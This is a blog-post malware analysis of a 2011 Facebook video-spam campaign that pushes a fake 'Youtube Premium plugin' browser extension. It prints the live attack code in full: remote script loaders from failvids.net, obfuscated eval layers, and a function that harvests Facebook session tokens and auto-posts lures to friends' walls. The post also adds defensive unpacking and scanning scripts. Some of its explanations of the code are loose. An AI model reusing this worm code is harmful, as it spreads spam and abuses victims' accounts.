Monday, December 19, 2011

The truth behind "Yeah!! It happens on television!!"(A Facebook Spam)

Facebook spamming is increasing day by day, and the site is becoming a home for spammers. The latest example is a video spam titled "[Video] Yeah!! It happens on television", which dangles some supposedly funny pornographic content to lure Facebook users. In this article I am going to reveal how this spam/virus (call it what you like) works and how you can protect yourself from it.


Warning: I did this inside a security sandbox. If you want to repeat the experiment, I ask you to do it inside a security sandbox too. Before doing this, clear all your browser data (cookies, cache, etc.).

So the attack scenario is like this:
You see one of your friends' status updates, something like:

It can happen to anyone! I dare you can watch this.

Lol Checkout this video its very embracing moment for Her.

blah..
blah..
blah..



Once you click on the malicious link, it sometimes asks you to share it with your friends before you can watch. Here lies the first trap.

Once you share it, it takes you to the following web page.
The address may vary, but in my case it was hwuheuwhewew.blogspot.com

When the page has fully loaded you get a message "Divx Missing Plugin".


When you click on the "Install plugin" button you are asked to download a plugin before you can watch the video. The plugin is the "youtube premium plugin" (the main virus).




As soon as you install the extension, the video is automatically shared on your wall and all of the friends in your profile are notified.

So if we look at the source code of that page (or use Firebug), we see many lines of code, but only the following is important.

<iframe allowtransparency='true' frameborder='0' height='305' id='player_iframe' name='player_iframe' scrolling='no' src='http://failvids.net/yt/plugin.html' width='577'></iframe>



From this it is clear that the page is loading the link 'http://failvids.net/yt/plugin.html' inside an iframe.

So, opening that link http://failvids.net/yt/plugin.html in the main browser, I found some interesting lines of code.




<center><span style="font-size:30px;font-weight:bold;text-decoration:underline;">Divx-Plugin Missing</span></center>

<ol>
    You do not have the plugin required to view the video<br><br>
    <li>Install Youtube Premium plugin<br><br><a onclick="instalar();" class="install nomargin"></a></li>
    <li>Then Reload this page by pressing F5</li>
</ol>

From the code above we can see that when a user clicks the [Install Plugin] button, the onclick event fires and the JS function instalar() is called.

Now if you go a little further up in the page's source code you can see the following lines.


<script>
    var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
    var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
    function instalar(){
        if (is_chrome){
            window.open("http://failvids.net/yt/youtube.crx");
        } else if(is_firefox){
            var params = {
                "Youtube Extension": {
                    URL: "http://failvids.net/yt/youtube.xpi",
                    toString: function () { return this.URL; }
                }
            };
            InstallTrigger.install(params);
        } else{
            window.open("http://failvids.net/yt/video.php");
        }
    }
    if(!is_chrome && !is_firefox )
        window.location="http://failvids.net/yt/video.php";
</script>


From this code we can see that the JavaScript is trying to identify the user's browser using "navigator.userAgent".

After that we have the function instalar(), as I mentioned earlier.
Inside this function you can see it checks whether the user's browser is Chrome; if so, it takes the user to "http://failvids.net/yt/youtube.crx".

If the browser is Firefox it takes the user to this URL: "http://failvids.net/yt/youtube.xpi" (via the InstallTrigger.install() call). Any other browser is sent to "http://failvids.net/yt/video.php".

Now, do you know what .xpi and .crx files are?

Well, an XPI file is a Mozilla/Firefox browser extension archive, and a CRX file is a Chrome browser extension archive.

Whatever Firefox add-on or Chrome extension you use, it comes as a .xpi or .crx package. If you open such a file in the same browser you will not be able to read it; you will just get a window like this.


My next target was to download those extension package files to learn what they do. The main problem when downloading a browser extension package is that you cannot download it in the same browser, and you should not try, because it is very risky:
if an attacker has somehow bypassed the browser's security, the add-on will be installed without your permission (this is not new in Internet history!).

So it is better to use a download manager. After downloading the files I decided to break open the .crx file, which is the one for Google Chrome.

Breaking the .CRX file.

Unpacking a .crx or .xpi file is not a big deal. Just rename youtube.crx to youtube.rar and unpack it using WinRAR.

So after unpacking the file I found the following files:

1) Chrome.manifest
2) go.js
3) manifest.json
4) and some icons.
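The rename-to-.rar trick works because a .crx is just a short header in front of an ordinary ZIP archive. The following is an added example (my own code, not the blog's and not anything shipped with the extension) that reads that header directly and lists the package contents and the manifest's content_scripts without ever loading the extension in a browser. The sample package it builds is constructed inline (a hypothetical manifest.json and go.js stub; the real youtube.crx from the page is not reproduced here); the CRX2/CRX3 header layout it parses is Chrome's documented format.

```python
"""Parse a Chrome .crx package offline and list what it contains.

CRX2: magic "Cr24", version=2, pubkey_len, sig_len (uint32 LE), pubkey, sig, ZIP
CRX3: magic "Cr24", version=3, header_len (uint32 LE), protobuf header, ZIP
"""
import io
import json
import struct
import zipfile

CRX_MAGIC = b"Cr24"


def split_crx(data: bytes) -> tuple:
    """Return (crx_version, zip_bytes) for a CRX2 or CRX3 blob."""
    if data[:4] != CRX_MAGIC:
        raise ValueError("not a CRX file (bad magic)")
    version = struct.unpack_from("<I", data, 4)[0]
    if version == 2:
        pubkey_len, sig_len = struct.unpack_from("<II", data, 8)
        zip_start = 16 + pubkey_len + sig_len
    elif version == 3:
        header_len = struct.unpack_from("<I", data, 8)[0]
        zip_start = 12 + header_len
    else:
        raise ValueError("unsupported CRX version %d" % version)
    zip_bytes = data[zip_start:]
    if zip_bytes[:2] != b"PK":
        raise ValueError("CRX payload is not a ZIP archive")
    return version, zip_bytes


def inspect_crx(data: bytes) -> dict:
    """List the archive members and the manifest fields an analyst checks first:
    which pages the content scripts run on, and which files they load."""
    version, zip_bytes = split_crx(data)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = sorted(zf.namelist())
        manifest = json.loads(zf.read("manifest.json"))
    return {
        "crx_version": version,
        "files": names,
        "name": manifest.get("name"),
        "content_scripts": [
            (cs.get("matches", []), cs.get("js", []))
            for cs in manifest.get("content_scripts", [])
        ],
        "permissions": manifest.get("permissions", []),
    }


def build_sample_crx() -> bytes:
    """Construct a CRX2 wrapper around a tiny hypothetical extension (test data)."""
    manifest = {
        "name": "Youtube Premium plugin",  # the lure name used on the page
        "version": "1.0",
        "content_scripts": [{"matches": ["http://*/*"], "js": ["go.js"]}],
        "permissions": ["tabs"],
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("manifest.json", json.dumps(manifest))
        zf.writestr("go.js", "loadScript_you();  // hypothetical stub body\n")
    pubkey = b"\x00" * 8  # dummy key and signature: only their lengths matter here
    sig = b"\x00" * 4
    header = CRX_MAGIC + struct.pack("<III", 2, len(pubkey), len(sig))
    return header + pubkey + sig + buf.getvalue()


if __name__ == "__main__":
    print(json.dumps(inspect_crx(build_sample_crx()), indent=2))
```

Run it against a real download by replacing build_sample_crx() with the bytes of the file; a content_scripts entry matching http://*/* with a single small .js file is exactly the shape the extension described here would have.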




The main code of this malicious extension is in the "go.js" file.
The source of "go.js" looks like this:

loadScript_you();
function loadScript_you() {
    // stays quiet on HTTPS pages; only injects on plain HTTP
    if ('https:' == document.location.protocol) return false;
    // builds a <script> tag pointing at the attacker's server and adds it to <head>
    var s = document.createElement('script');
    s.setAttribute("type","text/javascript");
    s.setAttribute("src", "http://failvids.net/yt/script.js");
    var head=document.getElementsByTagName("head")[0];
    if( head==null) return false;
    head.appendChild(s);
    return true;
}

From this we can see it is fetching a remote script from

http://failvids.net/yt/script.js

I tried to access http://failvids.net/yt/script.js and found the following lines of code. The server was very slow, but after waiting 4-5 minutes I got this.

function addScript() {
    // second stage: loads extra.js by hanging another <script> tag off the first one on the page
    var s = document.createElement('script');
    s.setAttribute("type", "text/javascript");
    s.setAttribute("src", "http://failvids.net/yt/extra.js");
    var a = document.getElementsByTagName('script')[0];
    if (a == null) return false;
    a.appendChild(s);
    return true
}
addScript();

You can see that the function "addScript()" also fetches an external JavaScript file

http://failvids.net/yt/extra.js

The main code was in the "extra.js" file, and it looks like this.

eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,101,110,99,104,117,108,97,116,117,70,66,40,41,32,123,10,32,32,32,32,118,97,114,32,105,102,114,97,59,10,32,32,32,32,105,102,32,40,108,111,99,97,116,105,111,110,46,104,114,101,102,46,109,97,116,99,104,40,47,57,56,102,98,118,105,100,101,111,47,103,105,41,32,124,124,32,108,111,99,97,116,105,111,110,46,104,114,101,102,46,109,97,116,99,104,40,47,57,56,102,98,118,105,100,101,111,47,103,105,41,41,32,123,10,32,32,32,32,32,32,32,32,105,102,114,97,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,108,105,102,114,97,109,101,39,41,10,32,32,32,32,32,32,32,32,105,102,32,40,105,102,114,97,32,33,61,32,110,117,108,108,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,105,102,114,97,46,105,110,110,101,114,72,84,77,76,32,61,32,39,60,105,102,114,97,109,101,32,105,100,61,34,99,104,97,110,103,101,34,32,119,105,100,116,104,61,34,53,48,48,34,32,115,114,99,61,34,104,116,116,112,58,47,47,102,97,105,108,118,105,100,115,46,110,101,116,47,121,116,47,118,105,100,101,111,46,112,104,112,34,32,104,101,105,103,104,116,61,34,51,48,48,34,32,115,99,114,111,108,108,105,110,103,61,34,110,111,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62,39,10,32,32,32,32,32,32,32,32,125,59,10,32,32,32,32,125,32,101,108,115,101,32,105,102,32,40,108,111,99,97,116,105,111,110,46,104,114,101,102,46,109,97,116,99,104,40,47,98,108,111,103,115,112,111,116,47,105,41,41,32,123,10,32,32,32,32,32,32,32,32,105,102,114,97,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,108,105,102,114,97,109,101,39,41,10,32,32,32,32,32,32,32,32,105,102,32,40,105,102,114,97,32,33,61,32,110,117,108,108,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,115,101,108,102,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,102,97,105,108,118,105,100,115,46,110,101,116,47,121,116,47,118,105,100,101,111,46,112,104,112,34,59,10,32,32,32,32,32,32,32,32,125,59,10,32,32,32,32,125,10,32,32,32,10,125,10,101,110,99,104,117,108,97,116,117,70,66,40,41,59))

eval(function (p, a, c, k, e, r) {
    e = function (c) {
        return c.toString(a)
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function (e) {
            return r[e]
        }];
        e = function () {
            return '\\w+'
        };
        c = 1
    };
    while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('e 4(){1 a=2.8(\'c\')[0];6(a==7)3 9;1 b=2.d("5");b.f="g://h.i.j/k/l.m";b.n="0";b.o="0";b.p="0";a.q(b);3 r}4();', 28, 28, '|var|document|return|load|img|if|null|getElementsByTagName|false|||body|createElement|function|src|http|whos|amung|us|swidget|acgflhphtsib|gif|width|height|border|appendChild|true'.split('|'), 0, {})) //eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('40="20";8(41.31.46(/^5:\\/\\/(9\\.)?45\\.14/47)){6 3=2["16"]("18");3.12="5://43.3.11/23/44.23.24";3.22="25/21";3.19=17(){6 15=2.35("34")[0];8(15==33)32 30;6 4=2.16("36");4.12="5://37.39.38/42/55.60";4.61="0";4.57="0";4.48="0";15.13(4);6 7=2["16"]("18");7.12="5://9.26.11/14/27.28/50.24?49="+51;7.22="25/21";7.19=17(){8(54=="20"){6 10=2.59("53");8(10==33){32 30}10.52[1].31="5://9.26.11/14/27.28/?56=58"}};2.29.13(7)};2.29.13(3)}',10,62,'||document|hashemian|ss|http|var|clcl|if|www|objobj|com|src|appendChild|cl|oo|createElement|function|script|onload|no|javascript|type|js|php|text|hardtrons|C8AA27305BBB4AD7B769656766711E4BC8AA27305BBB4AD7B769656766711E4B|asp|head|false|href|return|null|body|getElementsByTagName|img|whos|us|amung|VIH_DisplayOnPage|location|swidget|scripts|visitorIPHOST|bancoestado|match|i|border|ip|get|VIH_HostIP|children|side2|analisis|viri20111|STP|height|login|getElementById|gif|width'.split('|'),0,{}))
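Both obfuscation layers above can be peeled off statically, without running anything in a browser. The eval(String.fromCharCode(...)) layer is just a list of character codes, and the eval(function(p,a,c,k,e,r){...}) layer is the Dean Edwards packer: every word in p that parses as a base-a number is an index into the k word list, and the packer's own loop simply substitutes them back. The following is an added example (my own analysis helper, not code from the page or from the extension): CHARCODE_SAMPLE holds only the first 22 codes of the page's much longer list, PACKED_CALL is the first packer call copied from the page, and everything else is the example's own code.

```python
"""Statically decode the two obfuscation layers seen in extra.js."""
import re

# the first 22 character codes of the page's eval(String.fromCharCode(...)) payload
CHARCODE_SAMPLE = ("eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,101,"
                   "110,99,104,117,108,97,116,117,70,66,40,41))")

# the tail of the page's packer call: }('<p>', <a>, <c>, '<k>'.split('|'), 0, {}))
PACKED_CALL = r'''}('e 4(){1 a=2.8(\'c\')[0];6(a==7)3 9;1 b=2.d("5");b.f="g://h.i.j/k/l.m";b.n="0";b.o="0";b.p="0";a.q(b);3 r}4();', 28, 28, '|var|document|return|load|img|if|null|getElementsByTagName|false|||body|createElement|function|src|http|whos|amung|us|swidget|acgflhphtsib|gif|width|height|border|appendChild|true'.split('|'), 0, {}))'''

CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
PACKER_CALL_RE = re.compile(
    r"\}\('((?:\\.|[^'\\])*)',\s*(\d+),\s*(\d+),\s*'([^']*)'\.split\('\|'\)"
)


def decode_fromcharcode(js):
    """Decode every String.fromCharCode(n,n,...) call found in js."""
    out = []
    for m in CHARCODE_RE.finditer(js):
        codes = [int(n) for n in m.group(1).replace(" ", "").split(",") if n]
        out.append("".join(chr(c) for c in codes))
    return out


def unpack_packer(p, a, k):
    """Reverse the packer: each word that is a valid base-a number becomes
    k[index] when that entry is non-empty, otherwise the word is kept.
    This mirrors the packer's own regex replacement loop."""
    def sub(m):
        word = m.group(0)
        if "_" in word:          # int() would accept '1_0'; the packer never emits that
            return word
        try:
            idx = int(word, a)
        except ValueError:
            return word
        if 0 <= idx < len(k) and k[idx]:
            return k[idx]
        return word
    return re.sub(r"\b\w+\b", sub, p)


def unpack_packer_calls(js):
    """Find every packer call in js and return the unpacked sources."""
    results = []
    for m in PACKER_CALL_RE.finditer(js):
        # only quote escapes matter for the strings this packer produces
        p = m.group(1).replace("\\'", "'").replace('\\"', '"')
        a = int(m.group(2))
        k = m.group(4).split("|")
        results.append(unpack_packer(p, a, k))
    return results


if __name__ == "__main__":
    for layer in decode_fromcharcode(CHARCODE_SAMPLE):
        print("fromCharCode ->", layer)
    for src in unpack_packer_calls(PACKED_CALL):
        print("packer ->", src)
```

Unpacking the first packer call yields a function that appends an invisible 0x0 image from whos.amung.us to the page body, that is, a third-party visitor counter the extension plants on every HTTP page you visit. Fed the full extra.js, decode_fromcharcode() returns the enchulatuFB() function whose first codes are shown above.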

function readCookie(a) {
    var b = a + '=';
    var c = document['cookie']['split'](';');
    for (var d = 0; d < c['length']; d++) {
        var e = c[d];
        while (e['charAt'](0) == ' ') {
            e = e['substring'](1, e['length']);
        }
        if (e['indexOf'](b) == 0) {
            return e['substring'](b['length'], e['length']);
        }
    }
    return null;
}

function setCookie(nombre, valor, caducidad) {
    var expireDate = new Date()
    expireDate.setDate(expireDate.getDate() + caducidad);
    document.cookie = nombre + "=" + escape(valor) + "; expires=" + expireDate.toGMTString() + "; path=/";
}

function getRandomInt(a, b) {
    return Math['floor'](Math['random']() * (b - a + 1)) + a
}

function randomValue(a) {
    return a[getRandomInt(0, a['length'] - 1)]
}

function fb_comparte() {
    var user_id = readCookie('c_user');
    var uid = user_id;
    if (document['getElementsByName']('post_form_id')[0] == null || document['getElementsByName']('fb_dtsg')[0] == null) return false;
    var post_form_id = document['getElementsByName']('post_form_id')[0]['value'];
    var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
    var video_url = ['http://anuerherhee.blogspot.com/','http://doocjhjsuher.blogspot.com/'];
    var domains = ['http://i.imgur.com/b6eRh.jpg'];
    var p0 = ['check this out ... cool ',' This cool ...', 'I like it ..'];
    var p1 = ['check this out ... cool ',' Ehey ',' Hey ',' Hey! ',' about ',' Hello! ',' Look! ',' That last ',' Amazing!'];
    var p2 = ['u wont believe! ',' check the sad post ',' haha can happen to anyone!'];
    var p3 = [' I dare you can watch this . '];
    var message = '';
    var a;
    gf = new XMLHttpRequest();
    gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=' + uid + '&' + Math['random'](), false);
    gf['send']();
    if (gf['readyState'] != 4) {} else {
        data = eval('(' + gf['responseText']['substr'](9) + ')');
        if (data['error']) {
            return false;
        } else {
            a = data;
        }
    }
    var b = a['payload']['entries']['length'];
    if (b > 30) {
        b = 30
    };
    var cook = readCookie("fb_videobor_" + user_id);
    if (cook == "activo") return false;
    message = [randomValue(p1), randomValue(p2), randomValue(p3)]['join'](' ');
    var c = new XMLHttpRequest();
    var d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
    var title = '[VIDEO] Yeahh!! It happens on Live Television!';
    var summary = 'Lol Checkout this video its very embracing moments for her';
    var imagen = 'http://i.imgur.com/b6eRh.jpg';
    var e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + user_id + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][v]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
    c['open']('POST', d, true);
    c['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    c['setRequestHeader']('Content-length', e['length']);
    c['setRequestHeader']('Connection', 'keep-alive');
    c['onreadystatechange'] = function () {};
    c['send'](e);
    for (var f = 0; f < b; f++) {
        if (a['payload']['entries'][f]['uid'] != user_id) {
            message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' ');
            var g = new XMLHttpRequest();
            d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
            title = '[VIDEO] Yeahh!! It happens on Live Television!';
            summary = 'Lol Checkout this video its very embracing moment for her';
            imagen = 'http://i.imgur.com/b6eRh.jpg';
            e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + randomValue(p0) + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
            g['open']('POST', d, true);
            g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
            g['setRequestHeader']('Content-length', e['length']);
            g['setRequestHeader']('Connection', 'keep-alive');
            g['onreadystatechange'] = function () {};
            g['send'](e);
        }
    }
    setCookie("fb_videobor" + user_id, "activo", 300);
    return true;
}

function FBFBFB321() {
    if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
        var cook = readCookie("fb_videobor_");
        if (cook == "activo") {
            return false;
        }
        var user_id = readCookie('c_user');
        if (user_id == null) return false;
        cook = readCookie("fb_videobor_" + user_id);
        if (cook == "activo") {
            return false;
        }
        setTimeout(function () {
            fb_comparte();
        }, 2000);
        return true;
    }
    return false;
}
FBFBFB321();

From the code we can see that it first calls the function FBFBFB321(). This function is responsible for Facebook cookie hijacking.

From the function we can see that it checks the URL location.
Note: if it is http://facebook.com or https://, then it grabs the cookie from the browser.
As the Facebook cookie is always marked as secure, client-side JavaScript will not be able to read those cookies, so the user is safe.

After that we can see it calls the function fb_comparte(). This function is responsible for generating the random fake plugin comments. You can see from the code that it uses an Ajax request to http://www.facebook.com/ajax/profile/composer.php.
This is the main evil function. Analyzing it, I found that it first reads the user cookie c_user; the c_user cookie is nothing but the id of your Facebook profile.

Now the most critical feature of this virus is its user tracking feature.
If you look at the function readCookie() you can see it randomly adds a cookie to your browser and tracks your activity on the internet.
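Everything the walkthrough above found by hand (the remote script loaders in go.js and script.js, the eval/fromCharCode and packer layers, the bracket-notation document['...'] calls that hide API names, the c_user cookie read, and the fb_dtsg/post_form_id tokens posted to facebook.com/ajax/) can be turned into a quick triage scan for an unpacked extension. The following is an added example (my own code, not the blog's): GO_JS is go.js as quoted on the page, EXTRA_JS_EXCERPT is a constructed excerpt assembled from lines of the page's extra.js, and the indicator names are this example's own.

```python
"""Triage an unpacked extension's JavaScript for the tricks this campaign uses."""
import re
from collections import Counter

URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?:/[^\s\"'<>)]*)?")
# obj['name'](...) instead of obj.name(...): counts bracket-notation property access
BRACKET_ACCESS_RE = re.compile(r"\w+\['[A-Za-z_]\w*'\]")

# (indicator, regex): each one corresponds to a behaviour the article walks through
INDICATORS = [
    ("remote_script_loader", re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")),
    ("charcode_eval", re.compile(r"eval\(\s*String\.fromCharCode\(")),
    ("packer_eval", re.compile(r"eval\(\s*function\s*\(p,\s*a,\s*c,\s*k,\s*e,")),
    ("cookie_access", re.compile(r"document(?:\.cookie|\['cookie'\])")),
    ("csrf_token_harvest", re.compile(r"fb_dtsg|post_form_id")),
    ("facebook_ajax_post", re.compile(r"facebook\.com/ajax/")),
]

# go.js exactly as quoted on the page
GO_JS = """loadScript_you();
function loadScript_you() {
if ('https:' == document.location.protocol) return false;
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://failvids.net/yt/script.js");
var head=document.getElementsByTagName("head")[0];
if( head==null) return false;
head.appendChild(s);
return true;
}
"""

# constructed excerpt: individual lines taken from the page's extra.js listing
EXTRA_JS_EXCERPT = """
var c = document['cookie']['split'](';');
var user_id = readCookie('c_user');
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var gf = new XMLHttpRequest();
gf['open']('POST', 'http://www.facebook.com/ajax/profile/composer.php?__a=1', true);
gf['send'](e);
"""


def scan_js(name, source):
    """Return the indicators hit, the external hosts referenced, and the number of
    bracket-notation property accesses (a high count is a strong obfuscation signal)."""
    hits = [label for label, rx in INDICATORS if rx.search(source)]
    hosts = sorted({m.group(0).split("/")[2] for m in URL_RE.finditer(source)})
    return {
        "file": name,
        "indicators": hits,
        "hosts": hosts,
        "bracket_access_count": len(BRACKET_ACCESS_RE.findall(source)),
    }


def summarize(reports):
    """Collapse per-file reports into one verdict for the whole package."""
    counts = Counter()
    hosts = set()
    for r in reports:
        counts.update(r["indicators"])
        hosts.update(r["hosts"])
    suspicious = (counts["remote_script_loader"] > 0
                  or counts["charcode_eval"] > 0
                  or counts["csrf_token_harvest"] > 0)
    return {"suspicious": suspicious,
            "indicator_counts": dict(counts),
            "hosts": sorted(hosts)}


if __name__ == "__main__":
    reports = [scan_js("go.js", GO_JS), scan_js("extra.js", EXTRA_JS_EXCERPT)]
    for r in reports:
        print(r)
    print(summarize(reports))
```

Point scan_js() at every .js file in the unpacked folder: a package whose only script is a loader for a remote http:// script, plus anything touching document.cookie or fb_dtsg, is one you remove rather than keep.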

How to prevent this spam!
Don't ever click on a link posted with this content.

Don't share the content.

If you have unfortunately already followed the steps the spammers asked for, remove the extension they asked you to install ("Youtube extension").

How to Remove Add-ons and Extensions

http://support.google.com/chrome/bin/answer.py?hl=en&answer=113907

http://kb.mozillazine.org/Uninstalling_extensions



There is much more in there; right now it is not possible for me to explain the entire code. I hope this helps you! Feel free to drop comments. Thanks.